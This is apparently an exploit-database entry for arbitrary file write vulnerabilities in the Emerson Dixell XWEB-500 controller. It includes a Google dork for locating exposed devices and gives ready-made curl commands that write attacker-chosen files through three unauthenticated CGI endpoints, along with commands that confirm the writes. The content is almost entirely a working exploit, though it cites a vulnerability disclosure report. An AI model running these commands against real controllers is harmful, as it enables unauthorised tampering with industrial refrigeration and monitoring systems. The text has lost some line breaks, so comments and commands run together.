# Exploit Title: Dixell XWEB-500 - Arbitrary File Write# Google Dork: inurl:"xweb500.cgi"# Date: 03/01/2022# Exploit Author: Roberto Palamaro# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it# Version: XWEB-500# Tested on: Dixell XWEB-500# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability# Endpoint: logo_extra_upload.cgi# Here the first line of the POC is the filename and the second one is the content of the file be written# Write file
echo -e "file.extension\ncontent"| curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi"-X POST --data-binary @--H 'Content-Type: application/octet-stream'# Verify
curl -A Chrome -is"http://[target]:[port]/logo/"# Endpoint: lo_utils.cgi# Here ACTION=5 is to enable write mode
echo -e "ACTION=5\nfile.extension\ncontent"| curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi"-X POST --data-binary @--H 'Content-Type: application/octet-stream'# Verify using ACTION=3 to listing resources
echo -e "ACTION=3"| curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi"-X POST --data-binary @--H 'Content-Type: application/octet-stream'# Endpoint: cal_save.cgi# Here the first line of the POC is the filename and the second one is the content of the file be written
echo -e "file.extension\ncontent"| curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi"-X POST --data-binary @--H 'Content-Type: application/octet-stream'# Verify
curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi
